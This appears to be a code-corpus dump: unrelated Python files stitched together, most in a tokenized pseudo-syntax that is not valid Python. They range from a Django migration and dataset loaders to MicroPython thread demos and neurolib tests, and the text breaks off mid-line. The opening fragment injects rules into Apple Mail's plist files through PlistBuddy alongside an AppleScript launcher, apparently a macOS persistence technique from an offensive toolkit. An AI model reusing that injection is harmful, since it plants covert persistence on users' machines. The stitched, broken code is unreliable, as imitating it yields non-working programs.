version = "V2"
if "10.9" in v:
version = "V2"
if "10.10" in v:
version = "V2"
if "10.11" in v:
version = "V3"
if "10.12" in v:
version = "V4"
a.close()
if os.path.isfile(home + "/Library/Mobile Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist"):
print "Trying to write to Mobile"
os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mobile\ Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist")
else:
os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mail/" + version + "/MailData/SyncedRules.plist")
print "Writing to main rules"
os.system("/usr/libexec/PlistBuddy -c 'Merge " + RulesActiveState + "' "+ home + "/Library/Mail/" + version + "/MailData/RulesActiveState.plist")
os.system("rm " + SyncedRules)
os.system("rm " + RulesActiveState)
"""%(AppleScript SyncedRules RulesActiveState plist plist2 launcher)<line_sep><return>script<block_end><block_end> |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-29 08:23
<import_from_future_stmt> unicode_literals<import_stmt>django.db.models.deletion<import_from_stmt>django.db migrations<import_from_stmt>django.db models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('orchestra' '0053_worker_slack_user_id') ]<line_sep>operations=[migrations.RemoveField(# manually-reviewed
model_name='staffingrequest' name='worker' ) migrations.AddField(model_name='staffingrequest' name='communication_preference' field=models.ForeignKey(default=<none> on_delete=django.db.models.deletion.CASCADE to='orchestra.CommunicationPreference') ) migrations.AlterField(model_name='communicationpreference' name='communication_type' field=models.IntegerField(choices=[(0 'task_status_change') (1 'new_task_available')]) ) ]<block_end> |
<import_stmt>json<import_stmt>os<import_from_stmt>typing Callable Dict<import_stmt>PIL.Image<import_stmt>torch<import_stmt>torch.utils.data<class_stmt>SarcasmDataset(torch.utils.data.Dataset)<block_start>"""Dataset of Sarcasm videos."""<line_sep>FRAMES_DIR_PATH='../data/frames/utterances_final'<def_stmt>__init__ self transform:Callable=<none> videos_data_path:str='../data/sarcasm_data.json' check_missing_videos:bool=<true><arrow><none><block_start>self.transform=transform<with_stmt>open(videos_data_path)<as>file<block_start>videos_data_dict=json.load(file)<block_end><for_stmt>video_id list(videos_data_dict.keys())# Convert to list to possibly remove items.
<block_start>video_folder_path=self._video_folder_path(video_id)<if_stmt><not>os.path.exists(video_folder_path)<block_start><if_stmt>check_missing_videos<block_start><raise>FileNotFoundError(f"Directory {video_folder_path} not found, which was referenced in"<concat>f" {videos_data_path}")<block_end><else_stmt><block_start><del_stmt>videos_data_dict[video_id]<block_end><block_end><block_end>self.video_ids=list(videos_data_dict.keys())<line_sep>self.frame_count_by_video_id={video_id:len(os.listdir(self._video_folder_path(video_id)))<for>video_id self.video_ids}<block_end>@staticmethod<def_stmt>_video_folder_path video_id:str<arrow>str<block_start><return>os.path.join(SarcasmDataset.FRAMES_DIR_PATH video_id)<block_end>@staticmethod<def_stmt>features_file_path model_name:str layer_name:str<arrow>str<block_start><return>f'../data/features/utterances_final/{model_name}_{layer_name}.hdf5'<block_end><def_stmt>__getitem__ self index<arrow>Dict[str object]<block_start>video_id=self.video_ids[index]<line_sep>frames=<none><line_sep>video_folder_path=self._video_folder_path(video_id)<for_stmt>i,frame_file_name enumerate(os.listdir(video_folder_path))<block_start>frame=PIL.Image.open(os.path.join(video_folder_path frame_file_name))<if_stmt>self.transform<block_start>frame=self.transform(frame)<block_end><if_stmt>frames<is><none># noinspection PyUnresolvedReferences
<block_start>frames=torch.empty((self.frame_count_by_video_id[video_id] *frame.size()))<block_end>frames[i]=frame<block_end><return>{'id':video_id 'frames':frames}<block_end><def_stmt>__len__ self<arrow>int<block_start><return>len(self.video_ids)<block_end><block_end> |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
<import_from_future_stmt> absolute_import print_function<import_stmt>errno<import_stmt>os<import_stmt>uuid<def_stmt>rename_over_existing src dest<block_start><try_stmt># On Windows, this will throw EEXIST, on Linux it won't.
# on Win32 / Python 2.7 it throws OSError instead of IOError
<block_start>os.rename(src dest)<block_end><except_stmt>(OSError IOError)<as>e<block_start><if_stmt>e.errno<eq>errno.EEXIST# Clearly this song-and-dance is not in fact atomic,
# but if something goes wrong putting the new file in
# place at least the backup file might still be
# around.
<block_start>backup=dest+".bak-"+str(uuid.uuid4())<line_sep>os.rename(dest backup)<try_stmt><block_start>os.rename(src dest)<block_end><except_stmt>Exception<as>e<block_start>os.rename(backup dest)<line_sep><raise>e<block_end><finally_stmt><block_start><try_stmt><block_start>os.remove(backup)<block_end><except_stmt>Exception<block_start><pass><block_end><block_end><block_end><else_stmt><block_start><raise>e<block_end><block_end><block_end> |
"""Linux direct system call interface.
"""<line_sep> |
'''Concatenate multiple files into a single virtual dataset
'''<import_stmt>h5py<import_stmt>numpy<as>np<import_stmt>sys<import_stmt>os<def_stmt>concatenate file_names_to_concatenate<block_start>entry_key='data'# where the data is inside of the source files.
sh=h5py.File(file_names_to_concatenate[0] 'r')[entry_key].shape# get the first ones shape.
layout=h5py.VirtualLayout(shape=(len(file_names_to_concatenate) )+sh dtype=np.float64)<with_stmt>h5py.File("VDS.h5" 'w' libver='latest')<as>f<block_start><for_stmt>i,filename enumerate(file_names_to_concatenate)<block_start>vsource=h5py.VirtualSource(filename entry_key shape=sh)<line_sep>layout[i : : :]=vsource<block_end>f.create_virtual_dataset(entry_key layout fillvalue=0)<block_end><block_end><def_stmt>create_random_file folder index<block_start>"""create one random file"""<line_sep>name=os.path.join(folder 'myfile_'+str(index))<with_stmt>h5py.File(name=name mode='w')<as>f<block_start>d=f.create_dataset('data' (5 10 20) 'i4')<line_sep>data=np.random.randint(low=0 high=100 size=(5<times>10<times>20))<line_sep>data=data.reshape(5 10 20)<line_sep>d[:]=data<block_end><return>name<block_end><def_stmt>main argv<block_start>files=argv[1:]<if_stmt>len(files)<eq>0<block_start><import_stmt>tempfile<line_sep>tmp_dir=tempfile.mkdtemp()<for_stmt>i_file range(5)<block_start>files.append(create_random_file(tmp_dir index=i_file))<block_end><block_end>concatenate(files)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main(sys.argv)<block_end> |
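# Illustrative note (not part of the original script): with the five randomly
# generated source files above, each holding a (5, 10, 20) 'data' dataset, the
# resulting VDS.h5 exposes a single virtual 'data' dataset of shape
# (5, 5, 10, 20); slices are read lazily from the source files, e.g.
#   with h5py.File('VDS.h5', 'r') as f:
#       print(f['data'].shape)   # expected: (5, 5, 10, 20)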
<import_from_stmt>.aspp ASPP<import_from_stmt>.deeplabv3 DeepLabV3Decoder<import_from_stmt>.deeplabv3plus DeepLabV3PlusDecoder<import_from_stmt>.panoptic_deeplab PanopticDeepLabDecoder<line_sep> |
x=10<line_sep>y='Hi'<line_sep>z='Hello'<line_sep>print(y)<line_sep># breakpoint() is introduced in Python 3.7
breakpoint()<line_sep>print(z)<line_sep># Execution Steps
# Default:
# $python3.7 python_breakpoint_examples.py
# Disable Breakpoint:
# $PYTHONBREAKPOINT=0 python3.7 python_breakpoint_examples.py
# Using Other Debugger (for example web-pdb):
# $PYTHONBREAKPOINT=web_pdb.set_trace python3.7 python_breakpoint_examples.py
|
<import_from_stmt>hadooplib.mapper MapperBase<import_from_stmt>hadooplib.inputformat KeyValueInput<class_stmt>TFIDFMapper1(MapperBase)<block_start>"""
keep only the word in the key field
remove filename from key and put it into value
(word filename, number) -> (word, filename number)
e.g. (dog 1.txt, 1) -> (dog, 1.txt 1)
"""<def_stmt>__init__ self<block_start>MapperBase.__init__(self)<line_sep>self.set_inputformat(KeyValueInput)<block_end><def_stmt>map self key value<block_start>"""
extract filename from key and put it into value
@param key: word and filename
@param value: term frequency
"""<line_sep>word,filename=key.split()<line_sep>self.outputcollector.collect(word filename+","+value)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>TFIDFMapper1().call_map()<block_end> |
<import_stmt>os<import_stmt>re<import_from_stmt>glob glob<import_from_stmt>dataclasses dataclass<import_from_stmt>typing Dict<import_from_stmt>.korpora Korpus KorpusData<import_from_stmt>.utils default_korpora_path<line_sep>description=""" AI Hub provides datasets for training.
To use the data, you must visit the homepage at the address below, click "AI데이터" (AI Data),
and submit a request for each dataset you want to use.
https://www.aihub.or.kr/
The Korean speech data can be downloaded under `AI 데이터` (AI Data) > `교육/문화/스포츠/` (Education/Culture/Sports) >
`한국어음성` (Korean speech), or from the address below. In addition to the full 1000 hours of audio data,
AI Hub also provides the transcription scripts (text only) separately as plain text files (extension: trn).
https://www.aihub.or.kr/aidata/105 (as of 2021.01.27)
Requests for AI Hub training data are approved automatically as soon as they are submitted.
Korpora>=0.3.0 only provides a convenient way to load corpora that have already been downloaded locally.
This script uses the bundled transcription scripts (KsponSpeech_scripts.zip). Unpacking that file
produces the following files.
train.trn
dev.trn
eval_clean.trn
eval_other.trn
These files are assumed to be stored in `~/Korpora/AIHub_KsponSpeech_scripts/` or
`path/to/AIHub_KsponSpeech_scripts/`.
(Korpora developers <EMAIL>, <EMAIL>)"""<line_sep>license=""" The ownership and full terms of use of the data provided by AI Hub can be found at the following address.
https://aihub.or.kr/form/iyongyaggwan
Article 16 (Ownership of the Portal)
1. The intellectual property rights and other rights to the services provided by AI Hub, and to the software,
images, marks, logos, designs, service names, information, trademarks and the like required for those services,
belong to the operating institution (and to the institutions that have concluded contracts with the operating
institution in connection with providing the AI Hub service).
2. Except where explicitly approved by AI Hub, you may not modify, rent, lend, sell, distribute, produce, transfer,
sublicense, pledge as security or commercially exploit all or part of each of the assets referred to in the
preceding paragraph, nor may you allow a third party to do so"""<class_stmt>AIHubKsponSpeechKorpus(Korpus)<block_start><def_stmt>__init__ self root_dir=<none> force_download=<false> prefix='' name='AIHub_KsponSpeech'<block_start>super().__init__(description license)<if_stmt>root_dir<is><none><block_start>root_dir=os.path.join(default_korpora_path 'AIHub_KsponSpeech_scripts' prefix)<block_end><elif_stmt>isinstance(root_dir str)<and>os.path.isdir(root_dir)<block_start>root_dir=os.path.join(root_dir 'AIHub_KsponSpeech_scripts' prefix)<block_end>paths=find_corpus_paths(root_dir)<line_sep>self.train=KorpusData(f'{name}.train' load_aihub_kspon_speech_scripts(paths))<block_end><block_end>
id={self.sentence_id},
sentence={self.sentence},
pronounce_sentence={self.pronounce_sentence},
original_sentence={self.original_sentence},
pronounces={self.pronounces},
)"""<block_end><block_end><def_stmt>find_corpus_paths root_dir suffix='.trn'<block_start><def_stmt>match path<block_start><return>path[-4:]<eq>suffix<block_end># directory + wildcard
<if_stmt>isinstance(root_dir str)<block_start>paths=sorted(glob(f'{root_dir}/*{suffix}')+glob(root_dir))<block_end><else_stmt><block_start>paths=root_dir<block_end>paths=[path<for>path paths<if>match(path)]<if_stmt><not>paths<block_start><raise>ValueError('Not found corpus files. Check `root_dir`')<block_end><return>paths<block_end><def_stmt>parse_kspon_speech line<block_start>sentence_id,original_sentence=line.split(' :: ')<line_sep># Cleaning - remove unknown/noise labels
sentence=re.sub(r'\s*[ublon]/\s*' r' ' original_sentence)<line_sep># Cleaning - remove meaningless character(maybe typo in original transcription)
sentence=re.sub(r'^/ ' r' ' sentence)<line_sep># Cleaning - remove repetition characters
sentence=re.sub(r'[\+\*]' r'' sentence)<line_sep>pronounces=dict(re.findall(r'\(([^\)]+)\)/\(([^\)]+)\)' sentence))<line_sep>pron_sentence=re.sub(r'\(([^\)]+)\)/\(([^\)]+)\)' r'\2' sentence)<line_sep>sentence=re.sub(r'\(([^\)]+)\)/\(([^\)]+)\)' r'\1' sentence)<line_sep># Cleaning - remove filler characters
sentence=re.sub(r'(?<=[^\)])/\s*' r' ' sentence)<line_sep>pron_sentence=re.sub(r'(?<=[^\)])/\s*' r' ' pron_sentence)<line_sep># Cleaning - remove space+
sentence=re.sub(r' +' r' ' sentence)<line_sep>pron_sentence=re.sub(r' +' r' ' pron_sentence)<line_sep>original_sentence=original_sentence.strip()<line_sep>pron_sentence=pron_sentence.strip()<line_sep>sentence=sentence.strip()<line_sep><return>sentence_id sentence pron_sentence original_sentence pronounces<block_end><def_stmt>load_aihub_kspon_speech_scripts paths<block_start>examples=[]<for_stmt>path paths<block_start><with_stmt>open(path encoding='utf-8')<as>f<block_start>examples<augadd>[KsponSpeech(*parse_kspon_speech(line))<for>line f.readlines()]<block_end><block_end><return>examples<block_end> |
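# Illustrative usage sketch (assumes the KsponSpeech_scripts files have already been
# downloaded from AI Hub and unpacked as described in `description` above, and that
# KorpusData supports list-style indexing as in other Korpora corpora):
#   korpus = AIHubKsponSpeechKorpus(root_dir='path/to/AIHub_KsponSpeech_scripts')
#   first = korpus.train[0]   # a KsponSpeech dataclass instance
#   print(first.sentence_id, first.sentence, first.pronounces)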
# -*- coding: utf-8 -*-
"""
:copyright: 2015 Agile Geoscience
:license: Apache 2.0
"""<import_from_stmt>.energy energy<import_from_stmt>.similarity similarity<import_from_stmt>.dipsteer dipsteer<import_from_stmt>.spectrogram spectrogram<import_from_stmt>.spectraldecomp spectraldecomp<line_sep> |
<import_from_stmt>PyQt5.QtWidgets QAction QFileDialog QMenu QPushButton<import_from_stmt>inselect.lib.user_template UserTemplate<import_from_stmt>inselect.lib.utils debug_print<import_from_stmt>.user_template_choice user_template_choice<import_from_stmt>.utils load_icon reveal_path<class_stmt>UserTemplatePopupButton(QPushButton)<block_start>"User template popup button"<line_sep>FILE_FILTER='Inselect user templates (*{0})'.format(UserTemplate.EXTENSION)<def_stmt>__init__ self parent=<none><block_start>super(UserTemplatePopupButton self).__init__(parent)<line_sep># Configure the UI
self._create_actions()<line_sep>self.popup=QMenu()<line_sep>self.inject_actions(self.popup)<line_sep>self.setMenu(self.popup)<line_sep>user_template_choice().template_changed.connect(self.changed)<line_sep># User template might already have been loaded, so apply the initial choice
<if_stmt>user_template_choice().current<block_start>self.changed()<block_end><block_end><def_stmt>__del__ self# Doing this prevents segfault on exit. Unsatisfactory.
<block_start><del_stmt>self.popup<block_end><def_stmt>_create_actions self<block_start>self._choose_action=QAction("Choose..." self triggered=self.choose icon=load_icon(':/icons/open.png'))<line_sep>self._refresh_action=QAction("Reload" self triggered=self.refresh icon=load_icon(':/icons/refresh.png'))<line_sep>self._reveal_template_action=QAction("Reveal template" self triggered=self.reveal)<line_sep>self._default_action=QAction("Default ({0})".format(user_template_choice().DEFAULT.name) self triggered=self.default icon=load_icon(':/icons/close.png'))<block_end><def_stmt>inject_actions self menu<block_start>"Adds user template actions to menu"<line_sep>menu.addAction(self._choose_action)<line_sep>menu.addAction(self._refresh_action)<line_sep>menu.addAction(self._reveal_template_action)<line_sep>menu.addSeparator()<line_sep>menu.addAction(self._default_action)<block_end><def_stmt>default self checked=<false><block_start>"Sets the default template"<line_sep>user_template_choice().select_default()<block_end><def_stmt>choose self checked=<false><block_start>"Shows a 'choose template' file dialog"<line_sep>debug_print('UserTemplateWidget.choose')<line_sep>path,selectedFilter=QFileDialog.getOpenFileName(self "Choose user template" str(user_template_choice().last_directory()) self.FILE_FILTER)<if_stmt>path# Save the user's choice
<block_start>user_template_choice().load(path)<block_end><block_end><def_stmt>refresh self checked=<false><block_start>debug_print('UserTemplateWidget.refresh')<line_sep>user_template_choice().refresh()<block_end><def_stmt>reveal self checked=<false><block_start>reveal_path(user_template_choice().current_path)<block_end><def_stmt>changed self<block_start>"Slot for UserTemplateChoice.template_changed"<line_sep>debug_print('UserTemplateWidget.changed')<line_sep>choice=user_template_choice()<line_sep>self.setText(choice.current.name)<line_sep>self._default_action.setEnabled(<not>choice.current_is_default)<line_sep>self._refresh_action.setEnabled(<not>choice.current_is_default)<line_sep>self._reveal_template_action.setEnabled(<not>choice.current_is_default)<block_end><block_end> |
<import_stmt>machine _thread time<import_stmt>micropython gc<import_stmt>bme280<line_sep># Setup the LED pins
bled=machine.Pin(4 mode=machine.Pin.OUT)<line_sep>#rled = machine.Pin(0, mode=machine.Pin.OUT)
#gled = machine.Pin(2, mode=machine.Pin.OUT)
bled.value(0)<line_sep>#gled.value(0)
#rled.value(0)
# Setup I2C to be used with BME280 sensor
i2c=machine.I2C(scl=machine.Pin(26) sda=machine.Pin(25) speed=400000)<line_sep># Initialize BME280
bme=bme280.BME280(i2c=i2c)<line_sep># Define LED thread function
#---------------------------
<def_stmt>rgbled n=200 led=bled<block_start>notif_exit=4718<line_sep>notif_replay=2<line_sep>notif_count=3<line_sep>x=0<line_sep>_thread.allowsuspend(<true>)<while_stmt><true><block_start>led.value(1)<line_sep>time.sleep_ms(n)<line_sep>led.value(0)<line_sep>x=x+1<line_sep>t=10<while_stmt>t<g>0<block_start>notif=_thread.getnotification()<if_stmt>notif<eq>notif_exit<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Exiting"%(_thread.getSelfName()))<line_sep><return><block_end><elif_stmt>notif<eq>notif_replay<block_start>_thread.sendmsg(_thread.getReplID() "[%s] I've been notified"%(_thread.getSelfName()))<block_end><elif_stmt>notif<eq>notif_count<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Run counter = %u"%(_thread.getSelfName() x))<block_end><elif_stmt>notif<eq>777<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Forced EXCEPTION"%(_thread.getSelfName()))<line_sep>time.sleep_ms(1000)<line_sep>zz=234/0<block_end><elif_stmt>notif<ne>0<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Got unknown notification: %u"%(_thread.getSelfName() notif))<block_end>typ,sender,msg=_thread.getmsg()<if_stmt>msg<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Message from '%s'\n'%s'"%(_thread.getSelfName() _thread.getThreadName(sender) msg))<block_end>time.sleep_ms(100)<line_sep>t=t-1<block_end>gc.collect()<block_end><block_end># For LED thread we don't need more than 3K stack
_=_thread.stack_size(3<times>1024)<line_sep># Start LED thread
#rth=_thread.start_new_thread("R_Led", rgbled, (100, rled))
time.sleep_ms(500)<line_sep>#gth=_thread.start_new_thread("G_Led", rgbled, (250, gled))
bth=_thread.start_new_thread("B_Led" rgbled (100 bled))<line_sep># Function to generate BME280 values string
#---------------
<def_stmt>bmevalues <block_start>t,p,h=bme.read_compensated_data()<line_sep>p=p<floordiv>256<line_sep>pi=p<floordiv>100<line_sep>pd=p-pi<times>100<line_sep>hi=h<floordiv>1024<line_sep>hd=h<times>100<floordiv>1024-hi<times>100<line_sep>#return "[{}] T={0:1g}C ".format(time.strftime("%H:%M:%S",time.localtime()), round(t / 100,1)) + "P={}.{:02d}hPa ".format(pi, pd) + "H={}.{:01d}%".format(hi, hd)
<return>"[{}] T={}C ".format(time.strftime("%H:%M:%S" time.localtime()) t/100)+"P={}.{:02d}hPa ".format(pi pd)+"H={}.{:02d}%".format(hi hd)<block_end># Define BME280 thread function
#-----------------------
<def_stmt>bmerun interval=60<block_start>_thread.allowsuspend(<true>)<line_sep>sendmsg=<true><line_sep>send_time=time.time()+interval<while_stmt><true><block_start><while_stmt>time.time()<l>send_time<block_start>notif=_thread.getnotification()<if_stmt>notif<eq>10002<block_start>_thread.sendmsg(_thread.getReplID() bmevalues())<block_end><elif_stmt>notif<eq>10004<block_start>sendmsg=<false><block_end><elif_stmt>notif<eq>10006<block_start>sendmsg=<true><block_end><elif_stmt>(notif<le>3600)<and>(notif<ge>10)<block_start>interval=notif<line_sep>send_time=time.time()+interval<line_sep>_thread.sendmsg(_thread.getReplID() "Interval set to {} seconds".format(interval))<block_end>time.sleep_ms(100)<block_end>send_time=send_time+interval<if_stmt>sendmsg<block_start>_thread.sendmsg(_thread.getReplID() bmevalues())<block_end><block_end><block_end># 3K is enough for BME280 thread
_=_thread.stack_size(3<times>1024)<line_sep># start the BME280 thread
bmeth=_thread.start_new_thread("BME280" bmerun (60 ))<line_sep># === In the 3rd thread we will run Neopixels rainbow demo ===
np=machine.Neopixel(machine.Pin(22) 24)<line_sep># Define Neopixels thread function
#---------------
<def_stmt>thrainbow <block_start>pos=0<line_sep>bri=0.02<while_stmt><true><block_start><for_stmt>i range(0 24)<block_start>dHue=360.0/24<times>(pos+i)<line_sep>hue=dHue%360<line_sep>np.setHSB(i hue 1.0 bri 1 <false>)<block_end>np.show()<line_sep>notif=_thread.getnotification()<if_stmt>(notif<g>0)<and>(notif<le>100)<block_start>bri=notif/100.0<block_end><elif_stmt>notif<eq>1000<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Run counter = %u"%(_thread.getSelfName() pos))<block_end>pos=pos+1<block_end><block_end># Start the Neopixels thread
npth=_thread.start_new_thread("Neopixel" thrainbow ())<line_sep>time.sleep(1)<line_sep>machine.heap_info()<line_sep>_thread.list()<line_sep># Set neopixel brightness (%)
#_thread.notify(npth, 20)
# Get counter value from Neopixel thread
#_thread.notify(npth, 1000)
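# Further illustrative notifications (not in the original script), mirroring the
# codes handled in bmerun() above: request an immediate BME280 reading and change
# the reporting interval to 120 seconds.
#_thread.notify(bmeth, 10002)
#_thread.notify(bmeth, 120)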
|
<import_from_stmt>.base BaseImportTestCase<class_stmt>MetaHeaderTestCase(BaseImportTestCase)<block_start>serializer_name="tests.naturalkey_app.wizard.NoteMetaSerializer"<def_stmt>test_manual self<block_start>run=self.upload_file("naturalkey_meta.xlsx")<line_sep># Inspect unmatched columns and select choices
self.check_columns(run 4 4)<line_sep>self.update_columns(run {"Note":{"Date:":"event[date]" "Place:":"event[place][name]" "Note":"note" "Status":"status" }} )<line_sep># Start data import process, wait for completion
self.start_import(run [])<line_sep># Verify results
self.assert_log(run ["created" "parse_columns" "update_columns" "do_import" "import_complete" ] )<line_sep>self.assert_records(run ["Imported 'Minneapolis on 2019-01-01: Test Note 1' at row 4" "Imported 'Minneapolis on 2019-01-01: Test Note 2' at row 5" "Imported 'Minneapolis on 2019-01-01: Test Note 3' at row 6" ] )<block_end><block_end> |
"""A simple timer implementation.
Copyright 2018 The AdaNet Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>time<class_stmt>_CountDownTimer(object)<block_start>"""A simple count down timer implementation."""<def_stmt>__init__ self duration_secs<block_start>"""Initializes a `_CountDownTimer`.
Args:
duration_secs: Float seconds for countdown.
Returns:
A `_CountDownTimer` instance.
"""<line_sep>self._start_time_secs=time.time()<line_sep>self._duration_secs=duration_secs<block_end><def_stmt>secs_remaining self<block_start>"""Returns the remaining countdown seconds."""<line_sep>diff=self._duration_secs-(time.time()-self._start_time_secs)<line_sep><return>max(0. diff)<block_end><block_end> |
"""
Tests of noise input.
"""<import_stmt>unittest<import_stmt>numpy<as>np<import_from_stmt>chspy CubicHermiteSpline<import_from_stmt>neurolib.models.aln ALNModel<import_from_stmt>neurolib.utils.stimulus ConcatenatedStimulus ExponentialInput LinearRampInput OrnsteinUhlenbeckProcess RectifiedInput SinusoidalInput SquareInput StepInput SummedStimulus WienerProcess ZeroInput <line_sep>TESTING_TIME=5.3<line_sep>DURATION=10<line_sep>DT=0.1<line_sep>STIM_START=2<line_sep>STIM_END=8<line_sep>SHAPE=(2 int(DURATION/DT))<class_stmt>TestCubicSplines(unittest.TestCase)<block_start>RESULT_SPLINES=np.array([-0.214062 -0.215043])<line_sep>RESULT_ARRAY=np.array([0.193429 0.073445])<def_stmt>test_splines self<block_start>dW=WienerProcess(n=2 seed=42).as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(dW CubicHermiteSpline))<line_sep>np.testing.assert_allclose(self.RESULT_SPLINES dW.get_state(TESTING_TIME) atol=1e-05)<block_end><def_stmt>test_arrays self<block_start>dW=WienerProcess(n=2 seed=42).as_array(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(dW np.ndarray))<line_sep>time_idx=np.around(TESTING_TIME/DT).astype(int)<line_sep>np.testing.assert_allclose(self.RESULT_ARRAY dW[: time_idx] atol=1e-05)<block_end><def_stmt>test_shift_start_time self<block_start>SHIFT=5.0<line_sep>dW=WienerProcess(n=2 seed=42).as_cubic_splines(duration=DURATION dt=DT shift_start_time=SHIFT)<line_sep>self.assertTrue(isinstance(dW CubicHermiteSpline))<line_sep>self.assertEqual(dW[0].time SHIFT+DT)<line_sep>np.testing.assert_allclose(self.RESULT_SPLINES dW.get_state(TESTING_TIME+SHIFT) atol=1e-05)<block_end><block_end><class_stmt>TestToModel(unittest.TestCase)<block_start><def_stmt>test_single_node self<block_start>model=ALNModel()<line_sep>model.params["duration"]=2<times>1000<line_sep>stim=SinusoidalInput(amplitude=1.0 frequency=1.0)<line_sep>model_stim=stim.to_model(model)<line_sep>model.params["ext_exc_current"]=model_stim<line_sep>model.run()<line_sep>self.assertTrue(isinstance(model_stim np.ndarray))<line_sep>self.assertTupleEqual(model_stim.shape (1 int(model.params["duration"]/model.params["dt"])))<block_end><def_stmt>test_multi_node_multi_stim self<block_start>model=ALNModel(Cmat=np.random.rand(5 5) Dmat=np.zeros((5 5)))<line_sep>model.params["duration"]=2<times>1000<line_sep>stim=SinusoidalInput(amplitude=1.0 frequency=1.0)<line_sep>model_stim=stim.to_model(model)<line_sep>model.params["ext_exc_current"]=model_stim<line_sep>model.run()<line_sep>self.assertTrue(isinstance(model_stim np.ndarray))<line_sep>self.assertTupleEqual(model_stim.shape (5 int(model.params["duration"]/model.params["dt"])))<block_end><block_end><class_stmt>TestZeroInput(unittest.TestCase)<block_start><def_stmt>test_generate_input self<block_start>nn=ZeroInput(n=2 seed=42).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(nn np.ndarray))<line_sep>self.assertTupleEqual(nn.shape SHAPE)<line_sep>np.testing.assert_allclose(nn np.zeros(SHAPE))<block_end><def_stmt>test_get_params self<block_start>nn=ZeroInput(n=2 seed=42)<line_sep>params=nn.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42})<block_end><def_stmt>test_set_params self<block_start>nn=ZeroInput(n=2 seed=42)<line_sep>UPDATE={"seed":635}<line_sep>nn.update_params(UPDATE)<line_sep>params=nn.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 **UPDATE})<block_end><block_end><class_stmt>TestWienerProcess(unittest.TestCase)<block_start><def_stmt>test_generate_input 
self<block_start>dW=WienerProcess(n=2 seed=42).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(dW np.ndarray))<line_sep>self.assertTupleEqual(dW.shape SHAPE)<block_end><def_stmt>test_get_params self<block_start>dW=WienerProcess(n=2 seed=42)<line_sep>params=dW.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42})<block_end><def_stmt>test_set_params self<block_start>dW=WienerProcess(n=2 seed=42)<line_sep>UPDATE={"seed":6152 "n":5}<line_sep>dW.update_params(UPDATE)<line_sep>params=dW.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 **UPDATE})<block_end><block_end><class_stmt>TestOrnsteinUhlenbeckProcess(unittest.TestCase)<block_start><def_stmt>test_generate_input self<block_start>ou=OrnsteinUhlenbeckProcess(mu=3.0 sigma=0.1 tau=2<times>DT n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ou np.ndarray))<line_sep>self.assertTupleEqual(ou.shape SHAPE)<block_end><def_stmt>test_get_params self<block_start>ou=OrnsteinUhlenbeckProcess(mu=3.0 sigma=0.1 tau=2<times>DT n=2 seed=42 )<line_sep>params=ou.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "mu":3.0 "sigma":0.1 "tau":2<times>DT})<block_end><def_stmt>test_set_params self<block_start>ou=OrnsteinUhlenbeckProcess(mu=3.0 sigma=0.1 tau=2<times>DT n=2 seed=42 )<line_sep>UPDATE={"mu":2.3 "seed":12}<line_sep>ou.update_params(UPDATE)<line_sep>params=ou.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "mu":3.0 "sigma":0.1 "tau":2<times>DT **UPDATE})<block_end><block_end><class_stmt>TestStepInput(unittest.TestCase)<block_start>STEP_SIZE=2.3<def_stmt>test_generate_input self<block_start>step=StepInput(step_size=self.STEP_SIZE n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(step np.ndarray))<line_sep>self.assertTupleEqual(step.shape SHAPE)<line_sep>np.testing.assert_allclose(step self.STEP_SIZE)<block_end><def_stmt>test_start_end_input self<block_start>step=StepInput(start=STIM_START end=STIM_END step_size=self.STEP_SIZE n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(step[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(step[: int(STIM_END/DT):] 0.0)<block_end><block_end><class_stmt>TestSinusoidalInput(unittest.TestCase)<block_start>AMPLITUDE=2.3<line_sep>FREQUENCY=1000.0<def_stmt>test_generate_input self<block_start>sin=SinusoidalInput(amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 dc_bias=<true>).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(sin np.ndarray))<line_sep>self.assertTupleEqual(sin.shape SHAPE)<line_sep>np.testing.assert_almost_equal(np.mean(sin axis=1) 